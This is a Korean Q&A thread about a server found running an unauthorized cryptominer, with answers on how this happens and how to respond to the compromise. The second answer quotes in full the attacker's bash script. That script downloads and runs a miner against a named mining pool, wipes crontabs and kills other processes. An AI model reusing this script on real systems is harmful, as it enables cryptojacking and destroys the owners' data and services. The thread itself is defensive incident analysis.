내가 해킹당했나요?

내가 해킹당했나요?

전용서버를 운영하고 있는데 최근에 CPU 사용량이 높은 걸 발견하고 프로세스를 확인해 봤습니다. 누군가(믹 계정)가 내 서버에서 채굴을 하고 있는 것 같습니다. 어떻게 이럴 수있어? 과정은 다음과 같습니다. 이 계정을 정지시켰습니다. 또 무엇을 해야 합니까?

25516 mick  30  10  778m 6728 1132 S 740.5  0.2   8463:59 /tmp/sh64 -o stratum+tcp://multi1.wemineall.com:80 -u weedee.1 -p x --algo scrypt -B

답변1

서버측 스크립팅(PHP, Ruby 등)을 허용하는 웹 서버를 실행하는 경우 이 작업을 쉽게 수행할 수 있습니다.

사용자가 해야 할 일은 스크립트를 생성하고 파일을 다운로드한 /tmp/sh64다음 실행하는 것뿐입니다. 웹 스크립트에는 외부 프로그램을 실행하는 기능이 필요한 경우가 많으므로 이러한 유형의 활동을 방지하기가 어렵습니다.

해당 mick계정이 사용자의 웹 스크립트를 실행하는 데 사용된 계정과 동일하다면 해킹되지 않은 것입니다. 단 한 명의 사용자가 자신의 계정을 악용하고 있습니다.

이 동작을 방지하려면 여러 가지 방법으로 방지할 수 있습니다. 외부 프로그램 호출을 방지할 수 있습니다. 또는 장기 실행 프로그램(예: 60초 이상 실행되는 프로그램) 종료와 같은 작업을 수행할 수 있습니다.
설정에 대한 자세한 내용을 알지 못하면 최선의 조치를 결정하기 어려울 수 있습니다.

답변2

비슷한 문제가 있습니다. 그들은 오래된 버전의 Nagios NRPE 에이전트를 활용하여 wgetSourceforge의 비트코인 ​​마이너(NRPE 데몬 활성화 dont_blame_nrpe)를 설치하고 구성하는 스크립트를 실행했습니다. 내 컴퓨터에서 지속적인 시도가 발생했음을 나타내는 어떤 것도 찾지 못했습니다.

비트코인 채굴기를 설치하고 설정하기 위한 스크립트는 다음과 같습니다.

#!/bin/bash

miner_path="/tmp/tester"
miner_path2="/tmp/var/tester"
miner_path3="/dev/shm/tester"
stratum="stratum+tcp://multi1.wemineall.com:80"
worker="weedee.1"
myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
name="work.sh"
if [ -z "$myproc" ]
then    
    system=`uname -a`
    i686=`echo $system|grep i686`
    if ! [ -z "$i686" ]
      then

url="http://downloads.sourceforge.net/project/cpuminer/pooler-cpuminer-2.3.2-linux-x86.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcpuminer%2Ffiles%2F&ts=1390664640&use_mirror=netcologne"
      else

url="http://downloads.sourceforge.net/project/cpuminer/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcpuminer%2Ffiles%2F&ts=1390664665&use_mirror=netcologne"
    fi

    dll=`wget -q -O $miner_path $url;tar zxvf $miner_path -C /var/tmp/;mv /var/tmp/minerd $miner_path;chmod +x $miner_path`
    spwn=`$miner_path -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`
    myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
    #Failed in /var/tmp/ trying in /dev/shm
    if [ -z "$myproc" ]
    then
        #dll=`wget $url -O $miner_path2;chmod +x $miner_path2`
        dll=`wget -q -O $miner_path2 $url;tar zxvf $miner_path2 -C /tmp/;mv /tmp/minerd $miner_path2;chmod +x $miner_path2`
        spwn=`$miner_path2 -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`      
    fi
    myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
    #Failed in /tmp/ trying in /tmp
    if [ -z "$myproc" ]
    then        
        dll=`wget -q -O $miner_path3 $url;tar zxvf $miner_path3 -C /dev/shm/;mv /dev/shm/minerd $miner_path3;chmod +x $miner_path3`
        spwn=`$miner_path3 -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`      
    fi  

myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
  crontab -r
 fi  
 crontab -r
rm -rf /var/tmp/*.sh
kill -9 `ps x | grep -v nagios | grep -v nrpe | grep -v PID | grep -v $name | grep -v tester | grep -v grep | awk '{print $1}'

스크립트는 전적으로 Nagios 사용자로 실행되므로 루트 액세스가 필요하지 않습니다.

답변3

귀하의 시스템은 확실히 손상되었거나 최악의 경우 해킹당했습니다. 유사한 채굴 장비가 설치되고 있다는 다른 이야기도 있습니다.

나는 귀하의 시스템이 손상되었다는 입장을 취하고 그 안에 있는 모든 중요한 항목을 부팅하여 아직 백업하지 않은 경우 백업할 수 있도록 하겠습니다.

분석하다

그들이 어떻게 침입했는지 궁금하다면 설치된 서비스(웹, MySQL 등)의 전체 목록을 확인하고 누군가가 높은 권한을 얻을 수 있도록 허용하는 활성 취약점이 있는지 확인하고 싶을 것입니다.

모든 네트워크 기반 애플리케이션에 대한 네트워크 지원부터 시작하겠습니다. 일반적으로 이러한 응용 프로그램은 추가 응용 프로그램을 설치하기 위해 버퍼를 오버플로하고 웹 서버의 스택을 수정할 수 있습니다.

실제로 이러한 유형의 손상은 분리된 사고일 수 있으므로 시스템을 완전히 복원/설정하는 데 시간을 소비하지 않고도 문제가 되는 소프트웨어 및 맬웨어를 제거하는 것만으로도 충분합니다.

이 시스템이 VPS 기반 이미지를 사용하여 구축된 경우 패치를 적용하는 것이 모든 고객에게 가장 이익이 될 것 같으므로 공급자와 협력할 것입니다.

단순한 네트워크 스택 손상 그 이상

상자에 있는 모든 항목은 면밀히 조사되어야 하며 본질적으로 신뢰할 수 없지만 시간을 들여 공격자가 로그인한 위치를 알아낼 수 없는지 살펴보겠습니다. 그들은 시스템을 손상시킨 후 시스템에 추가된 SSH 계정을 사용하여 로그인했을 수 있습니다.

이는 분석하는 데 며칠이 걸리는 어려운 작업일 수 있습니다. 특히 작업에 도움이 되는 상자에 포함된 도구 중 어느 것도 신뢰할 수 없는 경우에는 더욱 그렇습니다. 적어도 이 특정 매체를 통해 향후 다시 발생할 위험을 줄일 수 있도록 시스템이 어떻게 손상되었는지 이해하는 데 시간을 할애하는 것이 좋습니다.

이것이 프로덕션 유형의 문제가 아니라면 실제로 시스템이 어떻게 손상될 수 있는지, 그리고 잠재적인 공격자가 액세스를 "악용"할 수 있는지에 대한 통찰력을 얻을 수 있는 훌륭한 학습 기회입니다.

희미한 희망?

시스템은 채굴 목적으로 사용되었기 때문에 자동화된 스크립팅 도구 세트를 사용했을 가능성이 높습니다. 봇 마이너를 설정하기 위해 충분한 시스템을 해킹하는 데 상당한 시간이 걸리는 것처럼 보였기 때문입니다. 이와 같은 도구를 사용할 때 그들은 종종 제대로 구성되지 않았으며 발판을 확보한 다음 페이로드(마이닝 소프트웨어)를 전달하기 위해 최소한의 작업만 수행하려고 하므로 운이 좋아서 그들로부터 추가 통찰력을 얻을 수 있습니다.

관련 정보